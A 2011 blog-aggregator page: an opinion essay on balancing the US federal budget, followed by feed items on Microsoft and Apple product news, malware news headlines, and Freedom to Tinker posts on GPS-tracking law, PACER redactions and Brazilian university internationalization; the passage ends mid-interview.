    We Americans must demand that the U.S. government work to balance its budget over time. The U.S. government has a massive annual deficit, resulting in a massive national debt that is growing beyond all reasonable bounds. For example, in just Fiscal Year (FY) 2010, about $3.4 trillion was spent, but only $2.1 trillion was received; that means that the U.S. government spent more than a trillion dollars more than it received. Every year that the government spends more than it receives it adds to the gross federal debt, which is now more than $13.6 trillion.

    This is unsustainable. The fact that this is unsustainable is certainly not news. The U.S. Financial Condition and Fiscal Future Briefing (GAO, 2008) says, bluntly, that the “Current Fiscal Policy Is Unsustainable”. “The Moment of Truth: Report of the National Commission on Fiscal Responsibility and Reform” similarly says “Our nation is on an unsustainable fiscal path”. Many others have said the same. But even though it’s not news, it needs to be yelled from the rooftops.

    The fundamental problem is that too many Americans — aka “we the people” — have not (so far) been willing to face this unpleasant fact. Fareed Zakaria nicely put this in February 21, 2010: “ … in one sense, Washington is delivering to the American people exactly what they seem to want. In poll after poll, we find that the public is generally opposed to any new taxes, but we also discover that the public will immediately punish anyone who proposes spending cuts in any middle class program which are the ones where the money is in the federal budget. Now, there is only one way to square this circle short of magic, and that is to borrow money, and that is what we have done for decades now at the local, state and federal level … The lesson of the polls in the recent elections is that politicians will succeed if they pander to this public schizophrenia. So, the next time you accuse Washington of being irresponsible, save some of that blame for yourself and your friends”.

    But Americans must face the fact that we must balance the budget. And we must face it now. We must balance the budget the same way families balance their budgets — the government must raise income (taxes), lower expenditures (government spending), or both. Growth over time will not fix the problem.

    How we rellocate income and outgo so that they match needs to be a political process. Working out compromises is what the political process is supposed to be all about; nobody gets everything they want, but eventually some sort of rough set of priorities must be worked out for the resources available. Compromise is not a dirty word to describe the job of politics; it is the job. In reality, I think we will need to both raise revenue and decrease spending. I think we must raise taxes to some small degree, but we can’t raise taxes on the lower or middle class much; they don’t have the money. Also, we will not be able to solve this by taxing the rich out of the country. Which means that we must cut spending somehow. Just cutting defense spending won’t work; defense is only 20% of the entire budget. In contrast, the so-called entitlements — mainly medicare, medicaid, and social security — are 43% of the government costs and rapidly growing in cost. I think we are going to have to lower entitlement spending; that is undesirable, but we can’t keep providing services we can’t pay for. The alternative is to dramatically increase taxes to pay for them, and I do not think that will work. Raising the age before Social Security benefits can normally be received is to me an obvious baby step, but again, that alone will not solve the problem. It’s clearly possible to hammer out approaches to make this work, as long as the various camps are willing to work out a compromise.

    To get there, we need to specify and plan out the maximum debt that the U.S. will incur in each year, decreasing that each year (say, over a 10-year period). Then Congress (and the President) will need to work out, each year, how to meet that requirement. It doesn’t need to be any of the plans that have been put forward so far; there are lots of ways to do this. But unless we agree that we must live within our means, we will not be able to make the decisions necessary to do so. The U.S. is not a Greece, at least not now, but we must make decisions soon to prevent bad results. I am posting this on Independence Day; Americans have been willing to undergo lots of suffering to gain control over their destinies, and I think they are still able to do so today.

    In the short term (say a year), I suspect we will need to focus on short-term recovery rather than balancing the budget. And we must not default. But we must set the plans in motion to stop the runaway deficit, and get that budget balanced. The only way to get there is for the citizenry to demand it stop, before far worse things happen.

    Sun 03 July, 2011

    Channel Image21:46 Microsoft Security Essentials 2.1» Bink.nu

    Microsoft Security Essentials 2.1

     

    Doesn’t tell what’s new, but download it at the MSE site:

     

    Virus, Spyware & Malware Protection  Microsoft Security Essentials


    Sat 02 July, 2011

    Channel Image00:48 Multinational Bank Goes Mobile with iPhone and iPad» Apple Hot News
    For Standard Chartered Bank — a Global 500 international bank with 1800 branches on six continents — iPhone and iPad provide a perfect platform to expand its mobile services, both internally and to its increasingly tech-savvy customers. “With iPhone and iPad, we’re really looking at the next generation of banking,” says Todd Schofield, Global Head of Enterprise Mobility at Standard Chartered Bank. “Managing our customers’ money is a responsibility we take very seriously, and our mobile services reflect that.”
    Channel Image00:42 Latest iMac Looks Great, Runs Faster» Apple Hot News
    Computerworld reviewer Michael deAgonia calls the new 27-inch iMac “a thoroughly modern all-in-one computer, with a sharp, bright screen that’s perfect for editing movies, organizing/editing photos, watching streaming video or making your own presentations.” Citing its minimalist design, enhanced performance from Sandy Bridge processors and AMD graphics chips, and the “very important addition” of Thunderbolt data transfer capabilities, deAgonia concludes: “Apple has delivered a solid update to what was already a popular and successful line.”

    Wed 29 June, 2011

    Channel Image23:54 'Indestructible' rootkit enslaves 4.5m PCs in 3 months» The Register - Security: Malware

    Latest TDSS embraces p2p, antivirus

    One of the world's stealthiest pieces of malware infected more than 4.5 million PCs in just three months, making it possible for its authors to force keyloggers, adware, and other malicious programs on the compromised machines at any time.…

    Tue 28 June, 2011

    Channel Image22:31 No clear Service Pack indication in Office 2010 (Updated)» Bink.nu

    So I just installed office 2010 Service Pack 1 and when you look in the Help screen in backstage pane, it doesn’t show Service Pack 1 is installed, only the build number is higher.

    Why does Microsoft do this, why make it hard for end users, administrators, support personnel to determine the Service Pack level. Now you need to puzzle with buildnumbers Steaming mad

    Also my office seems activated twice?? Sarcastic smile

    image

     

    UPDATE, thanks to commenters “just click on the "Additional Version and Copyright Information" and it will show the traditional Help --> About screen”

    image


    Channel Image17:04 MS advises drastic measures to fight hellish Trojan» The Register - Security: Malware

    Kill it with fire!

    Updated Microsoft is advising users to roll-back Windows if they happen to be unfortunate enough to get hit by a particularly vicious rootkit.…

    Channel Image15:59 Watch Office 365 launch event with Steve Ballmer» Bink.nu

     

    Steve Ballmer will announce news detailing the latest on Office 365 on Tuesday, June 28, at 10 a.m. EDT / 7 a.m. PDT. Watch the webcast here.

    Watch This Morning’s Office 365 Webcast

    …available in 40 markets. Introduced in beta last year, more than 200,000 organizations signed up and began testing it. Businesses testing Office 365 are already reporting impressive results, reducing IT costs by up to an estimated 50%, while boosting productivity.

    Office 365 offers a wide range of service plans for a predictable monthly price from $2 to $27 per user per month. With Office 365 for small businesses, customers can be up and running with Office Web Apps, Microsoft Exchange Online, Microsoft SharePoint Online, Microsoft Lync Online and an external website in minutes, for $6 (U.S.) per user, per month. These tools put enterprise-grade email, shared documents, instant messaging, video and Web conferencing, portals and more at everyone’s fingertips.

    Office 365 for enterprises has an array of choices, from simple email to comprehensive suites to meet the needs of midsize and large businesses, as well as government organizations. Customers can now get Microsoft Office Professional Plus on a pay-as-you-go basis with cloud-based versions of the industry’s leading business communications and collaborations services. Each of these plans come with the advanced IT controls, security, 24x7 IT support and reliability customers expect from Microsoft.

    Today, more than 20 service providers around the globe also shared plans to bring Office 365 to their customers this year. Bell Canada, Intuit Inc., NTT Communications Corporation, Telefonica S.A., Telstra Corp. and Vodafone Ltd., among others, will package and sell Office 365 with their own services — from Web hosting and broadband to finance solutions and mobile services — and bring those new offerings to millions of small and midsize businesses globally.

    Office 365 Announcement.


    Channel Image15:12 Actor Simon Pegg warns over banking Trojan Twitter hack» The Register - Security: Malware

    Malware that can 'shrink iPads' not altogether funny

    Zombie movie star Simon Pegg was obliged to warn his followers after his Twitter feed was hacked to post links to malware.…

    Channel Image10:46 Office 2010 SP1 to be released today» Bink.nu

    Microsoft will announce and release Office 2010 Service Pack 1 on Tuesday.

    The software giant is readying the Office 2010 SP1 release alongside the general availability launch of Office 365. Microsoft had previously promised Office 2010 SP1 “by the end of June.” WinRumors understands, from sources familiar with Microsoft’s plans, that the SP1 download will be made available at 9AM PST on Tuesday June 28. SP1 releases for both Office client suites and SharePoint server products will be made available. All language versions of SP1 will release at the same time. Service Pack 1 will be offered as a manual download from the Download Center and from Microsoft Update.

    Microsoft will include the following important fixes in SP1:

     

    • Outlook fixes an issue where “Snooze Time” would not reset between appointments.
    • The default behavior for PowerPoint “Use Presenter View” option changed to display the slide show on the secondary monitor.
    • Integrated community content in the Access Application Part Gallery.
    • Better alignment between Project Server and SharePoint Server browser support.
    • Improved backup / restore functionality for SharePoint Server
    • The Word Web Application extends printing support to “Edit Mode.”
    • Project Professional now synchronizes scheduled tasks with SharePoint task lists.
    • Internet Explorer 9 “Native” support for Office Web Applications and SharePoint
    • Office Web Applications Support for Chrome
    • Inserting Charts into Excel Workbooks using Excel Web Application
    • Support for searching PPSX files in Search Server
    • Visio Fixes scaling issues and arrowhead rendering errors with SVG export
    • Proofing Tools improve spelling suggestions in Canadian English, French, Swedish and European Portuguese.
    • Outlook Web Application Attachment Preview (with Exchange Online only)

    Microsoft plans to include the following security and non-security related fixes:

    Office 2010 SP1 to be released this week  WinRumors


    Mon 27 June, 2011

    Channel Image21:06 Supreme Court Takes Important GPS Tracking Case» Freedom to Tinker

    This morning, the Supreme Court agreed to hear an appeal next term of United States v. Jones (formerly United States v. Maynard), a case in which the D.C. Circuit Court of Appeals suppressed evidence of a criminal defendant's travels around town, which the police collected using a tracking device they attached to his car. For more background on the case, consult the original opinion and Orin Kerr's previous discussions about the case.

    No matter what the Court says or holds, this case will probably prove to be a landmark. Watch it closely.

    (1) Even if the Court says nothing else, it will face the constitutionally of the use by police of tracking beepers to follow criminal suspects. In a pair of cases from the mid-1980's, the Court held that the police did not need a warrant to use a tracking beeper to follow a car around on public, city streets (Knotts) but did need a warrant to follow a beeper that was moved indoors (Karo) because it "reveal[ed] a critical fact about the interior of the premises." By direct application of these cases, the warrantless tracking in Jones seems constitutional, because it was restricted to movement on public, city streets.

    Not so fast, said the D.C. Circuit. In Jones, the police tracked the vehicle 24 hours a day for four weeks. Citing the "mosaic theory often invoked by the Government in cases involving national security information," the Court held that the whole can sometimes be more than the parts. Tracking a car continuously for a month is constitutionally different in kind not just degree from tracking a car along a single trip. This is a new approach to the Fourth Amendment, one arguably at odds with opinions from other Courts of Appeal.

    (2) This case gives the Court the opportunity to speak generally about the Fourth Amendment and location privacy. Depending on what it says, it may provide hints for lower courts struggling with the government's use of cell phone location information, for example.

    (3) For support of its embrace of the mosaic theory, the D.C. Circuit cited a 1989 Supreme Court case, U.S. Department of Justice v. National Reporters Committee. In this case, which involved the Freedom of Information Act (FOIA) not the Fourth Amendment, the Court allowed the FBI to refuse to release compiled "rap sheets" about organized crime suspects, even though the rap sheets were compiled mostly from "public" information obtainable from courthouse records. In agreeing that the rap sheets nevertheless fell within a "personal privacy" exemption from FOIA, the Court embraced, for the first time, the idea that the whole may be worth more than the parts. The Court noted the difference "between scattered disclosure of the bits of information contained in a rap-sheet and revelation of the rap-sheet as a whole," and found a "vast difference between the public records that might be found after a diligent search of courthouse files, county archives, and local police stations throughout the country and a computerized summary located in a single clearinghouse of information." (FtT readers will see the parallels to the debates on this blog about PACER and RECAP.) In summary, it found that "practical obscurity" could amount to privacy.

    Practical obscurity is an idea that hasn't gotten much traction in the Courts since National Reporters Committee. But it is an idea well-loved by many privacy scholars, including myself, for whom it helps explain their concerns about the privacy implications of data aggregation and mining of supposedly "public" data.

    The Court, of course, may choose a narrow route for affirming or reversing the D.C. Circuit. But if it instead speaks broadly or categorically about the viability of practical obscurity as a legal theory, this case might set a standard that we will be debating for years to come.

    Channel Image17:56 Avast still focused on Windows, despite new Mac security app» The Register - Security: Malware

    Czech firm aims to checkmate VXers

    Free security software outfit Avast reckons unprotected Windows desktops still offer its greatest potential area for growth, despite its huge existing Windows user-base of 130 million active users.…

    Free Whitepaper: Implementing Energy Efficient Data Centers

    Thu 23 June, 2011

    Channel Image23:09 Feds declare victory over notorious Coreflood botnet» The Register - Security: Malware

    Unprecedented take-down gets results

    Federal authorities say they have crippled a notorious botnet that penetrated some of the world's most sensitive organizations, thanks to an unprecedented take-down strategy that used a government-run server that communicated directly with infected PCs.…

    Channel Image06:24 Man infects college PCs to steal huge database» The Register - Security: Malware

    Uni president targeted in brazen attack

    A former college student has admitted taking part in a criminal scheme that used malware to steal and sell large databases of faculty and alumni, change grades, and siphon funds from other students' accounts.…

    Wed 22 June, 2011

    Channel Image23:51 Update Rollup 4 for Exchange 2010 SP1» Bink.nu

    Earlier today the Exchange CXP team released Update Rollup 4 for Exchange Server 2010 SP1 to the Download Center.

    This update contains a number of customer-reported and internally found issues since the release of RU1. See 'KB 2509910: Description of Update Rollup 4 for Exchange Server 2010 Service Pack 1' for more details. In particular we would like to specifically call out the following fixes which are included in this release:

    • 2519359 Unable to Create a 'Reply With' Rule on Public Folders Even With Owner and Send As Permissions
    • 2394554 Generating DSN fails if original mail uses non-support encoding charset.
    • 2490134 Outlook 2007 does not deliver "Delayed Delivery" Messages against an Exchange 2010 Server in Online mode with any additional Transport loaded in the Outlook Profile

    Some of the above KnowledgeBase articles are not replicated/live at the time of writing this post. Please check back later in the day if you can't reach them.

    Update Rollup 5 for Exchange Server 2010 Service Pack 1 is currently scheduled to release in August 2011.

    General Notes

    Note for Exchange 2010 Customers using the Arabic and Hebrew language version: We introduced two new languages with the release of Service Pack 1, Arabic and Hebrew. At present we are working through the process of modifying our installers to incorporate these two languages. Customers running either of the two language versions affected are advised to download and install the English language version of the rollup which contains all of the same fixes.

    Note for Forefront users: For those of you running Forefront Security for Exchange, be sure you perform these important steps from the command line in the Forefront directory before and after this rollup's installation process. Without these steps, Exchange services for Information Store and Transport will not start after you apply this update. Before installing the update, disable ForeFront by using this command: fscutility /disable. After installing the update, re-enable ForeFront by running fscutility /enable


    Channel Image19:37 Malicious software downloads invade WordPress» The Register - Security: Malware

    Mandatory password reset enforced

    WordPress is requiring all account holders on the WordPress.org website to change their passwords following the discovery that hackers contaminated it with malicious software.…

    Tue 21 June, 2011

    Channel Image19:23 Apple Revolutionizes Video Editing With Final Cut Pro X» Apple Hot News
    Apple today announced Final Cut Pro X, a new version of the world’s most popular pro video editing software, rebuilt from the ground up on a modern 64-bit architecture. Final Cut Pro X completely reinvents video editing with a Magnetic Timeline that lets you edit on a flexible, trackless canvas; Content Auto-Analysis that categorizes your content upon import by shot type, media, and people; and background rendering that allows you to work without interruption. Final Cut Pro X is available from the Mac App Store for $299.99.

    Sat 18 June, 2011

    Channel Image07:00 New malware ferrets out and steals Bitcoins» The Register - Security: Malware

    Hopelessly devoted to you

    You know your virtual currency has hit the big leagues when criminals develop trojans that infect computers for the sole purpose of stealing it. Bitcoin, the open-source project launched two years ago, reached that turning point Thursday.…

    Fri 17 June, 2011

    Channel Image21:28 System Center Orchestrator 2012 Beta» Bink.nu

    The System Center Orchestrator 2012 Beta product provides the capability of automation of workflows (Runbooks) across other System Center and 3rd party products.

    The System Center Orchestrator Beta product provides the capability of automation of workflows (Runbooks) across other System Center and 3rd party products. These runbooks are created in the Runbook Designer, deployed via the Deployment Manager and run and monitored locally or remotely via the Orchestrator Console.
    Feature Bullet Summary:

    • Management Server
    • Orchestrator Console
    • Runbook Designer
    • Deployment Manager
    • Web service for reporting

     

    Download details System Center Orchestrator 2012 Beta


    Channel Image14:00 Google: Our rapid load won't give you anything nasty» The Register - Security: Malware

    You could get exploited without even saying yes

    Google has downplayed concerns that refinements to its search technology could leave surfers more exposed to search engine manipulation attacks.…

    Free Whitepaper: Implementing Energy Efficient Data Centers

    Thu 16 June, 2011

    Channel Image23:48 What Gets Redacted in Pacer?» Freedom to Tinker

    In my research on privacy problems in PACER, I spent a lot of time examining PACER documents. In addition to researching the problem of "bad" redactions, I was also interested in learning about the pattern of redactions generally. To this end, my software looked for two redaction styles. One is the "black rectangle" redaction method I described in my previous post. This method sometimes fails, but most of these redactions were done successfully. The more common method (around two-thirds of all redactions) involves replacing sensitive information with strings of XXs.

    Out of the 1.8 million documents it scanned, my software identified around 11,000 documents that appeared to have redactions. Many of them could be classified automatically (for example "123-45-xxxx" is clearly a redacted Social Security number, and "Exxon" is a false positive) but I examined several thousand by hand.

    Here is the distribution of the redacted documents I found.

    Type of Sensitive Information No. of Documents
    Social Security number 4315
    Bank or other account number 675
    Address 449
    Trade secret 419
    Date of birth 290
    Unique identifier other than SSN 216
    Name of person 129
    Phone, email, IP address 60
    National security related 26
    Health information 24
    Miscellaneous 68
    Total 6208

    To reiterate the point I made in my last post, I didn't have access to a random sample of the PACER corpus, so we should be cautious about drawing any precise conclusions about the distribution of redacted information in the entire PACER corpus.

    Still, I think we can draw some interesting conclusions from these statistics. It's reasonable to assume that the distribution of redacted sensitive information is similar to the distribution of sensitive information in general. That is, assuming that parties who redact documents do a decent job, this list gives us a (very rough) idea of what kinds of sensitive information can be found in PACER documents.

    The most obvious lesson from these statistics is that Social Security numbers are by far the most common type of redacted information in PACER. This is good news, since it's relatively easy to build software to automatically detect and redact Social Security numbers.

    Another interesting case is the "address" category. Almost all of the redacted items in this category—393 out of 449—appear in the District of Columbia District. Many of the documents relate to search warrants and police reports, often in connection with drug cases. I don't know if the high rate of redaction reflects the different mix of cases in the DC District, or an idiosyncratic redaction policy voluntarily pursued by the courts and/or the DC police but not by officials in other districts. It's worth noting that the redaction of addresses doesn't appear to be required by the federal redaction rules.

    Finally, there's the category of "trade secrets," which is a catch-all term I used for documents whose redactions appear to be confidential business information. Private businesses may have a strong interest in keeping this information confidential, but the public interest in such secrecy here is less clear.

    To summarize, out of 6208 redacted documents, there are 4315 Social Security that can be redacted automatically by machine, 449 addresses whose redaction doesn't seem to be required by the rules of procedure, and 419 "trade secrets" whose release will typically only harm the party who fails to redact it.

    That leaves around 1000 documents that would expose risky confidential information if not properly redacted, or about 0.05 percent of the 1.8 million documents I started with. A thousand documents is worth taking seriously (especially given that there are likely to be tens of thousands in the full PACER corpus). The courts should take additional steps to monitor compliance with the redaction rules and sanction parties who fail to comply with them, and they should explore techniques to automate the detection of redaction failures in these categories.

    But at the same time, a sense of perspective is important. This tiny fraction of PACER documents with confidential information in them is a cause for concern, but it probably isn't a good reason to limit public access to the roughly 99.9 percent of documents that contain no sensitive information and may be of significant benefit to the public.

    Thanks again to Carl Malamud and Public.Resource.Org for their support of my research.

    Wed 15 June, 2011

    Channel Image23:08 Adobe patches critical bugs in Flash and Reader» The Register - Security: Malware

    Second emergency Flash patch in 9 days

    Adobe has rolled out updates for its widely used Reader PDF viewer and Flash animation programs that fix flaws, some that hackers have been exploiting to hijack end user computers.…

    Channel Image21:18 Universities in Brazil are too closed to the world, and that's bad for innovation» Freedom to Tinker

    When Brazilian president Dilma Roussef visited China in the beginning of May, she came back with some good news (maybe too good to be entirely true). Among them, the announcement that Foxconn, the largest maker of electronic components, will invest US$12 billion to open a large industrial plant in the country. The goal is to produce iPads and other key electronic components locally.

    The announcement was praised, and made it quickly to the headlines of all major newspapers. There is certainly reason for excitement. Brazil lost important waves of economic development, including industrialization (which only really happened in the 1940´s), or the semiconductor wave, an industry that has shown but a few signs of development in the country until now. (continue reading)

    The president´s news also included the announcement that Foxconn would hire 100 thousand employees for the new plant, being 20% of them engineers. The numbers raised skepticism, for various reasons. Not only they seem exaggerated, but Brazil simply does not have 20,000 engineers available for hire. In 2008, the number of engineers in the country was 750,000 and the projection is that if growth rates continue at the same level, a deficit deficit in engineers is expected for the next years.

    The situation increases the pressure over universities to train engineers and also to cope with the demands of development and innovation. This is a complex debate, but it is worth focusing on one aspect of the Brazilian university system: its isolation from the rest of the world. In short, Brazilian universities, both in terms of students and faculty, are almost entirely made of Brazilians. As an example, at the University of Sao Paulo (USP), the largest and most important university in the country, only 2,8% of a total 56,000 students are international international. In most other universities the number of international students tend to be even smaller. Regarding faculty, the situation is not different. There have been a few recent efforts by some institutions (mostly private) to increase the number of international professors. But there is still a long way to go.

    The low degree of internationalization is already causing problems. For instance, it makes it difficult for Brazilian universities to score well on world ranks. By way of example, no Brazilian university has ever been included in the top 200 universities of the Times Higher Education World Ranking, a ranking that pays especial attention to internationalization efforts.

    Even if rankings might not be the main issue, the fact that the university system is essentially inward-looking indeed creates problems, making it harder for innovation. For instance, many of Foxconn's new plant engineers might end up being hired abroad. If some sort of integration is not established with Brazilian universities, that will consist of a missed opportunity for transferring technology or developing local capacity.

    The challenges of integrating such a large operation with universities are huge. Even for small scale cooperation, it turns out that the majority of universities in Brazil are unprepared to deal with international visitors, either students or faculty. For an international professor to be formally hired by a local university, she will have in most cases have to validate her degree in Brazil. The validation process can be Kafkian, requiring lots o paperwork (including "sworn translations") and time, often months or years. This poses a challenge not only for professors seeking to teach in Brazil, but also to Brazilian who obtained a degree abroad and return home. Local boards of education do not recognize international degrees, regardless if they have been awarded by Princeton or the Free University of Berlin. Students return home formally with the same academic credentials they had before obtaining a degree abroad. The market often recognize the value of the international degrees, but the the university system does not.

    The challenges are visible also at the very practical level. Most of universities do not have an office in charge of foreign admissions or international faculty or students. Many professors who venture into the Brazilian university system will go through the process without formal support, counting on the efforts and enthusiasm of local peer professors who undertake the work of dealing with the details of the visit (obtaining a Visa, work permit, or the long bureaucratic steps to get the visitor’s salary actually being paid).

    The lack of internationalization is bad innovation. As pointed out by Princeton’s computer science professor Kai Li during a recent conference on technology cooperation between the US and China organized by the Center for Information Technology Policy, the presence of international students and faculty in US universities has been crucial for innovation. Kai emphasizes the importance of maintaining an ecosystem for innovation, which not only attracts the best students to local universities, but help retain them after graduation. Many will work on research, create start-ups or get jobs in the tech industry. The same point was made recently by Lawrence Lessig at his recent G8 talk in France, where he claimed that a great deal of innovation in the US was made by “outsiders”.

    Another important aspect of the lack of internationalization in Brazil is the lack of institutional support. Government funding organizations, such as CAPES, CNPQ, Fapesp and others, play an important role. But Brazil still lacks both public and private institutions aimed specifically at promoting integration, Brazilian culture and international exchange (along the lines of Fulbright, the Humboldt Foundation, or institutes like Cervantes, Goethe or the British Council).

    As mentioned by Volker Grassmuck, a German media studies professor who spent 18 months as a researcher at the University of Sao Paulo: “The Brazilian funding institutions do have grants for visiting researchers, but the application has to be sent locally by the institution. In the end of my year in Sao Paulo I applied to FAPESP, the research funding age of the Sao Paulo state, but it did not work out, since my research group did not have a research project formalized there”.

    He compares the situation with German universities, saying that “when I started teaching at Paderborn University which is a young (funded in 1972) mid-sized (15.000 students) university in a small town, the first time I walked across campus, I heard Indian, Vietnamese, Chinese, Arabic, Turkish and Spanish. At USP during the entire year I never heard anything but Portuguese”. (see Volker's full interview below)

    Of course any internationalization process at this point has to be very well planned. In Brazil, 25% of the universities are public and 75% private. There is still a huge deficit of places for local students, even with the university population growing quite fast in the past 6 years. In 2004 Brazil had 4,1 milllion university students. In 2010, the number reached 6,5 million. However, only 20% of young students in Brazil find a place at the university system, different from the 43% in Chile or 61% in Argentina. The country still struggles to provide access to its own students at universities. But at the same time, the effort of internationalization should not be understood as competing with expanding access. The challenge for Brazil is actually to do both things at the same time: expanding access to local students, and promoting internationalization. If Brazil wants to play a role as an important emerging economy, that´s the way to go (no one said it would be easy!). One thing should not exclude the other.

    In this sense, João Victor Issler, an economics professor at EPGE (the Graduate School of Economics at Fundação Getulio Vargas), has a pragmatic view about the issue. He says: “inasmuch as Brazil develops economically, it will inexorably increase the openness of the university system. I am not saying that there should not be specific initiatives to increase internationalization, but an isolated process will be limited. More important than the internationalization of students and faculty is opening the economy to commerce and finance, a process that will directly affect long-term economic development and all its variables: education, innovation and the work force”. João Victor´s point is important. If internationalization follows development, there is already some catch up to do. The country has developed significantly in the past 16 years, but that has not corresponded to any significant improvement in the internationalization of universities.

    A few strategies might help achieving more openness on the part of Brazilian universities, without necessarily competing with the goal of expanding access to local students. One of them is the use ICT´s for international collaboration. Another is providing support to what is already working. But there is more that could be done to improve internationalization. Here is a short list:

    a) Development organizations such as the World Bank or the Interamerican Development Bank (IDB) can play an important role. Once the internationalization goal is defined, they could provide the necessary support, in partnership with local institutions.

    b) Pay attention to the basics: creating specific departments to centralize support for international students and faculty. They should be responsible for the strategy, but also help with practical matters, such as Visa, travel, and coping with the local bureaucracy.

    c) The majority of Brazilian universities´ websites are only in Portuguese. Even the webpage of the International Cooperation Commission at the University of Sao Paulo is mostly in Portuguese, and many of the English links are broken.

    d) Increase the use of Information and Communication Technologies (ICT´s) as a tool for cooperation and for integrating students and faculty with international projects. Increasing distance learning programs and cooperation mediated by ICT´s is a no-brainer.

    e) Create a prize system for internationalization projects, to be awarded every few years to the educational institution that best advanced that goal.

    f) Consider a policy-effective tax break to the private sector (which might include private universities), in exchange for developing successful research centers that include an international component.

    g) Brazilian organizations funding research should seek to increase support to international researchers and professors who would like to develop projects in Brazil.

    h) Regional integration is the low-hanging fruit. Attracting the best students from other Latin American countries is an opportunity to kickstart international cooperation

    i) Map what is already in place, identifying what is working in terms of internationalization and supporting its expansion.

    j) Brazil needs an innovation research lab. Large investment packages, such as the government support to Foxconn´s new plant should include integration with universities and the creation of a public/private research center, focused on innovation.

    Below are the the complete interviews with Volker Grassmuck and João Victor Issler, with their perspectives on the issue.

    Interview with Volker Grassmuck

    Volker is currently a lecturer at Paderborn University. He spent 18 months in Brazil as a visiting researcher affiliated with the University of Sao Paulo. His visit contributed significantly to the Brazilian copyright reform debate. He partnered with local researchers and law professors (as well as artists and NGO’s) to develop an innovative compensation system for artists, which has become part of the copyright reform debate.

    1) How do you think the Brazilian Universities are prepared to receive students and professors/researchers from abroad?

    I did not experience any special provisions for foreigners at USP. The inviting professor has to navigate university bureaucracy for the visiting researcher just as for any Brazilian researcher. I did experience a number of bizarre situations, but these were not specific to me, but the same for all in our research group.

    E.g.: In order to receive my grant I was forced to open an account with the only bank that has an office on the USP Leste campus. The money from Ford Foundation was already there, and it was exactly the same amount that was supposed to be made over to my account at the same day of the month. But every single month had to remind the person in our group in charge of administrative issues that the money had not arrived. She would then go to the university administration to pick up a check that physically had to be carried to the bank to deposit it there. If the single person in the administration in charge was ill this would be delayed until that person came back.

    Another path a foreigner can pursue is to apply for a professorship at a Brazilian university. I looked into this while I was there and got advice from a few people who had actually done this. Prerequisite would be a “revalidating” my German Ph.D. This is a long procedure, requiring originals and copies of diploma, grades etc. authenticated by the Brazilian Consulate, a copy of the dissertation, maybe even a translation into Portuguese, an examination similar to the original Ph.D. examination plus some extras (e.g. “didactics”) that you don’t have at a German university and a fee, in the case of USP, of R$ 1,530.00. In other words, Brazilian academy does not trust Free University of Berlin to issue valid Ph.Ds and requires me to essentially go through the whole Ph.D. procedure all over again. And then I would be able to take a “public competition”, which is yet another procedure unlike anything required by a German university.

    2) What is the situation in the German universities? Are they prepared and/or do receive foreign students and professors/researcher?

    Being German I have not experienced being a foreign student or researcher here. But here are some impressions: When I started teaching at Paderborn University which is a young (funded in 1972) mid-sized (15.000 students) university in a small town, the first time I walked across campus, I heard Indian, Vietnamese, Chinese, Arabic, Turkish and Spanish. At USP during the entire year I never heard anything but Portuguese, except in the language course where there were people from other Latin American countries, two women from Spain and one visiting researcher from the US. Staff at Paderborn is less international, but once or twice a week there is a presentation by a guest speaker from a university in Europe or beyond.

    This is anecdotal, of course. I’m sure objective numbers would show a different picture. The Centrum für Hochschulentwicklung (CHE) does a regular ranking of German universities. It includes their international orientation. This year’s result: the business faculties at universities of applied science are leading with 50%. Only 35% of universities got ranked as being internationally oriented, with sociology and political sciences being the weakest. http://www.che-ranking.de/

    I wonder how Brazilian universities would rank by the same standards.

    c) Do you think there is a connection between innovation and foreign students at local universities?

    No doubt about it. I did see an international orientation is two forms: 1. People read the international literature in the fields I’m interested in in. But without having actual people to enter into a dialogue with this often remains a reproduction or at best an application of innovations to Brazil. 2. People travel and study abroad. A few students and professors travel extensively. Some students from our group went to Bolivia, Mozambique, France during my year there. So there is a certain internationalization „from Brazil” but my overwhelming impression was that there is very little academic internationalization „of Brazil.”

    Interview with João Victor Issler

    Joao Victor Issler is an economics professor at the Fundacao Getulio Vargas Graduate School of Economics, who has been been closely following the recent internationalization efforts. His full bio here.

    a) How do you see the presence of international students and faculty at the Brazilian universities?

    The presence of of both is quite rare. There are a few isolated efforts here and there by a few groups. For example, in Economics, we have PUC-Rio (Pontifical Catholic University at Rio) in Economics and IMPA (National Institute for Pure and Applied Mathematics) who have at their masters and Ph.D. level students from Argentina, Chile, Peru etc. Our school, EPGE (FGV Graduate Scool of Economics) hires professors outside Brazil, but we do not have specific incentives for international students. Beyond Economics, I know that the University of Sao Paulo is seeking to attract international students, but it is hard to tell at what schools and how many

    b) Foxcoon announced it will open a new plant in Brazil, and will hire 20,000 engineers for that. We clearly don´t have that many engineers. Do you think that the internationalization of universities could help the country to build better capacity for developing its tech-industry?

    These numbers announced cannot be trusted. In any way, the general perception is that there is a deficit of engineers in Brazil. The tech-market, however, is an endogenous variable, correlated to our GDP per capita, the level of education of the working force, number of houses with access to drinkable water, infrastructure, etc. Inasmuch as Brazil develops economically, it will inexorably increase the openness of the university system. I am not saying that there should not be specific initiatives to increase internationalization, but an isolated process will be limited. More important than the internationalization of students and faculty is opening the economy to commerce and finance, a process that will directly affect long-term economic development and all its variables: education, innovation and the work force.

    c) In other countries, there are institutions such as the Goethe Institute, or the Humboldt Foundation in Germany, that end up attracting international talents. The same goes for the US, with the Fulbright program. Why not in Brazil?

    Germany and other European countries face problems due to the shape of their age demographic pyramid, whose base is small compared to the top. They have a better capacity to offer places in the university, that go beyond German students. Thus, it is possible to attract international students, in order to fill the present capacity. It is hard to say how this structure will evolve. They might reduce the installed capacity, or increase the search for international students. And they are looking for Brazilian students, for instance, especially engineers. Generally, developed countries tend to attract good students (and wealthier) than the developing countries, what explains this movement towards Germany, the US or Canada. To me, the US are the most important model regarding the higher education industry. In the beginning of the 20th Century, there were already many Japanes and Chinese students at universities in the US and Europe. With the development of Japan, this movement decreased in the end of the Century. Brazil today (for instance, the University of Sao Paulo) attrachs a few good students from Latin America. And it could attract more if we develop faster than the rest of the region. In Brazil, CAPES (for which I was an advisor until recently) plays a similar role than the institutions you mentioned. They are engaged in several bilateral agreements for students and professors. This openness is certainly positive. For students and professors, it is important to consider the hierarchy and quality: the best students tend to go to the US and Europe. We end up with the midle, and others go to countries where the development level is lower. As I mentioned, I don’t believe it is possible to change this pattern unilaterally, unless we want to apply huge public resources on that. In my view, it is not a priority, given the current levels of subsidies already applied to higher education in comparison with fundamental education in Brazil.

    d) In your opinion, and considering the experience of EPGE, what are the advantages or disadvantages of increasing interationalization at Brazilian universities? Would that reduce space for Brazilians?

